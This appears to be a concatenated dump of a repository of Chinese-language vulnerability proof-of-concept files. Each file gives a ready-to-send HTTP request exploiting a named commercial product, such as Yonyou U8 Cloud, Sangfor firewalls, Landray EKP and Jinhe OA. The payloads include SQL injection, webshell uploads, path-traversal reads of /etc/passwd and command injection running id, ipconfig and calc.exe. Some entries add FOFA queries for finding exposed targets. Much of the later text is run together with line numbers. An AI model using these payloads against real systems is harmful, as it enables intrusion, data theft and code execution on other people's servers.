Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

--------------------------------------------------------------------------------
/超级猫签名APP分发平台前台存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
```
GET /user/install/downfile_ios?id=') UNION ALL SELECT NULL,NULL,CONCAT(IFNULL(CAST(CURRENT_USER() AS NCHAR),0x20)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 127.0.0.1:81
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
```

--------------------------------------------------------------------------------
/用友U8 Cloud MeasureQueryFrameAction SQL注入漏洞.md:
--------------------------------------------------------------------------------
FOFA:

```
title=="U8C"
```

```
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryFrameAction&method=doRefresh&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

--------------------------------------------------------------------------------
/eking管理易FileUpload接口存在任意文件上传漏洞.md:
--------------------------------------------------------------------------------
```
POST /app/FileUpload.ihtm?comm_type=EKING&file_name=../../rce.jsp. HTTP/1.1
Host:
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=WebKitFormBoundaryHHaZAYecVOf5sfa6

--WebKitFormBoundaryHHaZAYecVOf5sfa6
Content-Disposition: form-data; name="uplo_file"; filename="rce.jpg"

<% out.println("hello");%>
--WebKitFormBoundaryHHaZAYecVOf5sfa6--
```

--------------------------------------------------------------------------------
/全息AI网络运维平台存在命令执行漏洞.md:
--------------------------------------------------------------------------------
```
POST /nmss/cloud/Ajax/ajax_cloud_router_config.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.1249.139 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: 
application/x-www-form-urlencoded
Content-Length: 34

ping_cmd=8.8.8.8|echo test > 1.txt
```

--------------------------------------------------------------------------------
/深信服-下一代防火墙-RCE.md:
--------------------------------------------------------------------------------
```
POST /cgi-bin/login.cgi HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Content-Length: 112
Content-Type: Application/X-www-Form
Cookie: PHPSESSID=`$(echo 156828301~ > /fwlib/sys/virus/webui/svpn_html/qwer.txt)`;
Accept-Encoding: gzip

{\"opr\":\"login\", \"data\":{\"user\": \"watchTowr\" , \"pwd\": \"watchTowr\" , \"vericode\": \"EINW\" , \"privacy_enable\": \"0\"}}
```

--------------------------------------------------------------------------------
/致远互联FE协作办公平台apprvaddNew存在SQL注入.md:
--------------------------------------------------------------------------------
fofa

```
body="li_plugins_download"
```

```http
POST /witapprovemanage/apprvaddNew.jsp HTTP/1.1
Host:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 95

flowid=1' AND 1=DBMS_PIPE.RECEIVE_MESSAGE(CHR(79)||CHR(116)||CHR(104)||CHR(85),3) AND '1'='1
```

--------------------------------------------------------------------------------
/微信公众平台-无限回调系统-SQL注入.md:
--------------------------------------------------------------------------------
```
POST /user/ajax.php?act=siteadd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: 
application/x-www-form-urlencoded 6 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 7 | Accept-Encoding: gzip, deflate 8 | Accept-Language: zh-CN,zh;q=0.9 9 | Connection: close 10 | 11 | siteUrl=';select sleep(5)#' 12 | ``` 13 | 14 | -------------------------------------------------------------------------------- /用友GRPA++Cloud 政府财务云 selectGlaDatasourcePreview SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | **fofa** 2 | 3 | ``` 4 | body="/pf/portal/login/css/fonts/style.css" 5 | ``` 6 | 7 | 8 | 9 | ``` 10 | POST /gla/dataSource/selectGlaDatasourcePreview HTTP/1.1 11 | Host: x.x.x.x 12 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 13 | Content-Type: application/x-www-form-urlencoded 14 | Connection: close 15 | Content-Length: 74 16 | 17 | exe_sql=SELECT%20999*999&pageNumber=1&pageSize=10&exe_param=11,1,11,1,11,1 18 | ``` 19 | 20 | -------------------------------------------------------------------------------- /金和OA_HomeService.asmxSQL注入.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /c6/jhsoft.mobileapp/AndroidSevices/HomeService.asmx/GetHomeInfo?userID=1'%3b+WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1 3 | Host: 4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 6 | Accept-Encoding: gzip, deflate 7 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 8 | Connection: close 9 | ``` 10 | 11 | -------------------------------------------------------------------------------- /瑞斯康达多业务智能网关RCE.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET 
/vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftest.php%60 HTTP/1.1 3 | Host: 4 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0 5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 6 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 7 | Accept-Encoding: gzip, deflate, br 8 | Connection: close 9 | ``` 10 | 11 | -------------------------------------------------------------------------------- /用友 UAP querygoodsgridbycode SQL 注入.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /ecp/productonsale/querygoodsgridbycode.json?code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29--+dpxi HTTP/1.1 3 | Host: 4 | Accept-Encoding: gzip, deflate 5 | Upgrade-Insecure-Requests: 1 6 | Pragma: no-cache 7 | Accept-Language: zh-CN,zh;q=0.9 8 | ``` 9 | 10 | -------------------------------------------------------------------------------- /Array VPN任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /prx/000/http/localhost/client_sec/%00../../../addfolder HTTP/1.1 3 | Host: ip:port 4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 6 | Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 7 | Accept-Encoding: gzip, deflate 8 | X_AN_FILESHARE: uname=t; password=t; sp_uname=t; flags=c3248;fshare_template=../../../../../../../../etc/passwd 9 | Dnt: 1 10 | Upgrade-Insecure-Requests: 1 11 | 
Connection: close 12 | ``` 13 | 14 | -------------------------------------------------------------------------------- /蓝凌 EKP 远程代码执行漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /ekp/sys/ui/sys_ui_component/sysUiComponent.do?method=replaceExtend&extendId=../../../../resource/help/km/review/&folderName=../../../ekp/sys/common HTTP/1.1 3 | Host: 4 | ``` 5 | 6 | 利用 dataxml.jsp 执行任意代码 7 | 8 | ``` 9 | POST /ekp/resource/help/km/review/dataxml.jsp HTTP/1.1 10 | Host: 11 | Content-Type: application/x-www-form-urlencoded 12 | 13 | s_bean=sysFormulaSimulateByJS&script=var x = 14 | Function/**/('return(java.lang.Runtime.getRuntime())')();x.exec("calc.exe");var a=mainOutput();function mainOutput() {}; 15 | ``` 16 | 17 | -------------------------------------------------------------------------------- /蓝凌EIS智慧协同平台frm_button_func.aspx SQL注入.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /frm/frm_button_func.aspx?formid=1%20and%201=@@version--+ HTTP/1.1 3 | Host: xxxx 4 | Upgrade-Insecure-Requests: 1 5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, 6 | like Gecko) Chrome/87.0.4280.88 Safari/537.36 7 | Accept: 8 | text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag 9 | e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 10 | Accept-Encoding: gzip, deflate 11 | Accept-Language: zh-CN,zh;q=0.9 12 | Connection: close 13 | ``` 14 | 15 | -------------------------------------------------------------------------------- /蓝凌EIS智慧协同平台frm_form_list_main.aspx SQL注入.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /frm/frm_form_list_main.aspx?list_id=1%20and%201=@@version--+ HTTP/1.1 3 | Host: x 4 | Upgrade-Insecure-Requests: 1 5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, 6 | like Gecko) Chrome/87.0.4280.88 Safari/537.36 7 | 
Accept: 8 | text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag 9 | e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 10 | Accept-Encoding: gzip, deflate 11 | Accept-Language: zh-CN,zh;q=0.9 12 | Connection: close 13 | ``` 14 | 15 | -------------------------------------------------------------------------------- /瑞斯康达-多业务智能网关-RCE.md: -------------------------------------------------------------------------------- 1 | ``` 2 | 3 | GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftest.php%60 HTTP/1.1 4 | Host: 5 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0 6 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 7 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 8 | Accept-Encoding: gzip, deflate, br 9 | Connection: close 10 | ``` 11 | 12 | -------------------------------------------------------------------------------- /万户ezOFFICE协同管理平台 getAutoCode SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /defaultroot/platform/custom/customizecenter/js/getAutoCode.jsp;.js?pageId=1&head=2%27+AND+6205%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2898%29%7C%7CCHR%2866%29%7C%7CCHR%2890%29%7C%7CCHR%28108%29%2C5%29--+YJdO&field=field_name&tabName=tfield HTTP/1.1 3 | Host: 4 | Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8 5 | Accept-Encoding: gzip, deflate 6 | Accept-Language: zh-CN,zh;q=0.9 7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36 8 | ``` 9 | 10 | -------------------------------------------------------------------------------- /深信服下一代防火墙NGAF存在任意文件上传漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST /cgi-bin/login.cgi 
HTTP/1.1 3 | User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 4 | Accept-Encoding: gzip, deflate 5 | Accept: */* 6 | Connection: close 7 | Host: 127.0.0.1 8 | Content-Type: Application/X-www-Form 9 | Cookie: PHPSESSID=`$(echo 7258052001 > /fwlib/sys/virus/webui/svpn_html/502082888.txt)`; 10 | Content-Length: 111 11 | 12 | {"opr":"login", "data":{"user": "watchTowr" , "pwd": "watchTowr" , "vericode": "EINW" , "privacy_enable": "0"}} 13 | ``` 14 | 15 | -------------------------------------------------------------------------------- /蓝凌EIS智慧协同平台ShowUserInfo.aspx SQL注入.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /third/DingTalk/Demo/ShowUserInfo.aspx?account=1'%20and%201=@@version--+ 3 | HTTP/1.1 4 | Host: x 5 | Upgrade-Insecure-Requests: 1 6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, 7 | like Gecko) Chrome/87.0.4280.88 Safari/537.36 8 | Accept: 9 | text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag 10 | e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 11 | Accept-Encoding: gzip, deflate 12 | Accept-Language: zh-CN,zh;q=0.9 13 | Connection: close 14 | ``` 15 | 16 | -------------------------------------------------------------------------------- /蓝凌EIS智慧协同平台fl_define_flow_chart_show.aspx SQL注入.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /flow/fl_define_flow_chart_show.aspx?id=1%20and%201=@@version--+ HTTP/1.1 3 | Host: x 4 | Upgrade-Insecure-Requests: 1 5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, 6 | like Gecko) Chrome/87.0.4280.88 Safari/537.36 7 | Accept: 8 | text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag 9 | e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 10 | Accept-Encoding: gzip, deflate 11 | Accept-Language: zh-CN,zh;q=0.9 
12 | Connection: close 13 | ``` 14 | 15 | -------------------------------------------------------------------------------- /蓝凌EIS智慧协同平台UniformEntry.aspx SQL注入.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /third/DingTalk/Pages/UniformEntry.aspx?moduleid=1%20and%201=@@version--+ 3 | HTTP/1.1 4 | Host: xxxx 5 | Upgrade-Insecure-Requests: 1 6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, 7 | like Gecko) Chrome/87.0.4280.88 Safari/537.36 8 | Accept: 9 | text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag 10 | e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 11 | Accept-Encoding: gzip, deflate 12 | Accept-Language: zh-CN,zh;q=0.9 13 | Connection: close 14 | ``` 15 | 16 | -------------------------------------------------------------------------------- /金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /c6/JHSoft.Web.CustomQuery/UploadFileDownLoadnew.aspx/?FilePath=../Resource/JHFileConfig.ini HTTP/1.1 3 | Host: 4 | Upgrade-Insecure-Requests: 1 5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 6 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 7 | Accept-Encoding: gzip, deflate, br 8 | Accept-Language: zh-CN,zh;q=0.9 9 | Connection: close 10 | ``` 11 | 12 | -------------------------------------------------------------------------------- /蓝凌EIS智慧协同平台doc_fileedit_word.aspx SQL注入.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version-- 3 | +&edittype=1,1 HTTP/1.1 4 | Host: xxxx 5 | Upgrade-Insecure-Requests: 1 6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
AppleWebKit/537.36 (KHTML, 7 | like Gecko) Chrome/87.0.4280.88 Safari/537.36 8 | Accept: 9 | text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag 10 | e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 11 | Accept-Encoding: gzip, deflate 12 | Accept-Language: zh-CN,zh;q=0.9 13 | Connection: close 14 | ``` 15 | 16 | -------------------------------------------------------------------------------- /科拓全智能停车视频收费系统CancelldList存在SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST /KT_Admin/CarCard/DoubtCarNoListFrom.aspx HTTP/1.1 3 | Host: 4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 6 | Accept-Encoding: gzip, deflate 7 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 8 | Content-Type: application/x-www-form-urlencoded 9 | Connection: close 10 | 11 | start=0&limit=20&filer=1;SELECT SLEEP(5)# 12 | ``` 13 | 14 | -------------------------------------------------------------------------------- /金和OAC6-FileDownLoad.aspx任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1 3 | Host: {{Hostname}} 4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 6 | Accept-Encoding: gzip, deflate, br 7 | Accept-Language: zh-CN,zh;q=0.9 8 | Cache-Control: max-age=0 9 | Connection: close 10 | Upgrade-Insecure-Requests: 1 11 | ``` 12 | 13 | -------------------------------------------------------------------------------- 
/喰星云-数字化餐饮服务系统shelflife.php存在SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | 3 | GET /logistics/home_warning/php/shelflife.php?do=getList&lsid=(SELECT+(CASE+WHEN+(6193=6193)+THEN+''+ELSE+(SELECT+9641+UNION+SELECT+2384)+END)) HTTP/1.1 4 | Host: 5 | Upgrade-Insecure-Requests: 1 6 | Priority: u=0, i 7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 8 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 9 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 10 | Accept-Encoding: gzip, deflate 11 | ``` 12 | 13 | -------------------------------------------------------------------------------- /拓尔思TRS媒资管理系统任意文件上传.md: -------------------------------------------------------------------------------- 1 | ``` 2 | 3 | POST /mas/servlets/uploadThumb?appKey=sv&uploadingId=asd HTTP/1.1 4 | Accept: */* 5 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySl8siBbmVicABvTX 6 | Connection: close 7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 8 | 9 | ------WebKitFormBoundarySl8siBbmVicABvTX 10 | Content-Disposition: form-data; name="file"; 11 | filename="%2e%2e%2fwebapps%2fmas%2fa%2etxt" 12 | Content-Type: application/octet-stream 13 | 14 | xxx 15 | ------WebKitFormBoundarySl8siBbmVicABvTX-- 16 | ``` 17 | 18 | -------------------------------------------------------------------------------- /29网课交单平台epay.php存在SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST /epay/epay.php HTTP/1.1 3 | Host: your-ip 4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 5 | Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 6 | Accept-Encoding: gzip, deflate 7 | Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 8 | Content-Type: application/x-www-form-urlencoded 9 | Connection: close 10 | 11 | out_trade_no=' AND (SELECT 8078 FROM (SELECT(SLEEP(5)))eEcA) AND 'aEmC'='aEmC 12 | ``` 13 | 14 | -------------------------------------------------------------------------------- /喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | 3 | GET /logistics/home_warning/php/not_finish.php?do=getList&lsid=(SELECT+(CASE+WHEN+(6192=6193)+THEN+''+ELSE+(SELECT+9641+UNION+SELECT+2384)+END)) HTTP/1.1 4 | Host: 5 | Upgrade-Insecure-Requests: 1 6 | Priority: u=0, i 7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 8 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 9 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 10 | Accept-Encoding: gzip, deflate 11 | 12 | ``` 13 | 14 | -------------------------------------------------------------------------------- /金和OA_jc6_Upload任意文件上传.md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST /jc6/servlet/Upload?officeSaveFlag=0&dbimg=false&path=&setpath=/upload/ HTTP/1.1 3 | Host: 127.0.0.1 4 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) 5 | Accept-Encoding: gzip, deflate 6 | Accept: */* 7 | Connection: close 8 | Content-Length: 197 9 | Content-Type: multipart/form-data; boundary=ee055230808ca4602e92d0b7c4ecc63d 10 | 11 | --ee055230808ca4602e92d0b7c4ecc63d 12 | Content-Disposition: form-data; name="img"; filename="1.jsp" 13 | Content-Type: image/jpeg 14 | 15 | <% out.println("tteesstt1"); %> 16 | --ee055230808ca4602e92d0b7c4ecc63d-- 17 | ``` 18 | 19 | 
-------------------------------------------------------------------------------- /喰星云-数字化餐饮服务系统stock.php存在SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | 3 | GET /logistics/home_warning/php/stock.php?do=getList&lsid=%28SELECT+%28CASE+WHEN+%289764%3D9765%29+THEN+%27%27+ELSE+%28SELECT+7700+UNION+SELECT+3389%29+END%29%29 HTTP/1.1 4 | Host: 5 | Upgrade-Insecure-Requests: 1 6 | Priority: u=0, i 7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 8 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 9 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 10 | Accept-Encoding: gzip, deflate 11 | ``` 12 | 13 | -------------------------------------------------------------------------------- /金和OA_MailTemplates.aspx_SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /C6/JHSoft.Web.Mail/MailTemplates.aspx/?tempID=1%3BWAITFOR+DELAY+%270%3A0%3A3%27-- HTTP/1.1 3 | Host: you_ip 4 | Pragma: no-cache 5 | Cache-Control: no-cache 6 | Upgrade-Insecure-Requests: 1 7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 8 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 9 | Accept-Encoding: gzip, deflate 10 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 11 | Connection: close 12 | ``` 13 | 14 | -------------------------------------------------------------------------------- /建文工程管理系统desktop.ashx存在SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST /SysFrame4/Desktop.ashx HTTP/1.1 3 | Host: 4 | Content-Type: application/x-www-form-urlencoded 5 | Accept-Encoding: gzip 6 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 
10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 7 | 8 | account=1%27+AND+8607+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%288607%3D8607%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28106%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29-- RvNO&method=isChangePwd&pwd= 9 | ``` 10 | 11 | -------------------------------------------------------------------------------- /金和OA_uploadfileeditorsave接口存在任意文件上传漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST /C6/Control/UploadFileEditorSave.aspx?filename=\....\....\C6\qps4cckjuz.asp HTTP/1.1 3 | Host: your_ip 4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 5 | Connection: close 6 | Content-Length: 191 7 | Content-Type: multipart/form-data; boundary=----9fh1lo9qobtszaiahg6v 8 | Accept-Encoding: gzip, deflate 9 | 10 | ------9fh1lo9qobtszaiahg6v 11 | Content-Disposition: form-data; name="file"; filename="qps4cckjuz.jpg" 12 | Content-Type: image/png 13 | 14 | <% response.write(111*111) 15 | %> 16 | 17 | ------9fh1lo9qobtszaiahg6v-- 18 | ``` 19 | 20 | -------------------------------------------------------------------------------- /科荣AIO系统UtilServlet存在任意命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | 3 | POST /UtilServlet HTTP/1.1 4 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) 5 | Accept-Encoding: gzip, deflate 6 | Accept: */* 7 | Connection: close 8 | Host: 9 | Content-Length: 324 10 | Content-Type: application/x-www-form-urlencoded 11 | 12 | 
operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+ipconfig").getInputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field 13 | 14 | ``` 15 | 16 | -------------------------------------------------------------------------------- /绿盟 SAS堡垒机 Exec 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /webconf/Exec/index?cmd=id HTTP/1.1 3 | Host: 127.0.0.1 4 | Cookie: PHPSESSID=4b250694b3e8973d81aaa03eefc85509 5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 6 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 7 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 8 | Accept-Encoding: gzip, deflate 9 | Upgrade-Insecure-Requests: 1 10 | Sec-Fetch-Dest: document 11 | Sec-Fetch-Mode: navigate 12 | Sec-Fetch-Site: none 13 | Sec-Fetch-User: ?1 14 | Te: trailers 15 | Connection: close 16 | ``` 17 | 18 | -------------------------------------------------------------------------------- /飞讯云MyImportData前台SQL注入.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /MyDown/MyImportData?opeid=72000301' HTTP/1.1 3 | Host: 4 | Pragma: no-cache 5 | Cache-Control: no-cache 6 | Upgrade-Insecure-Requests: 1 7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 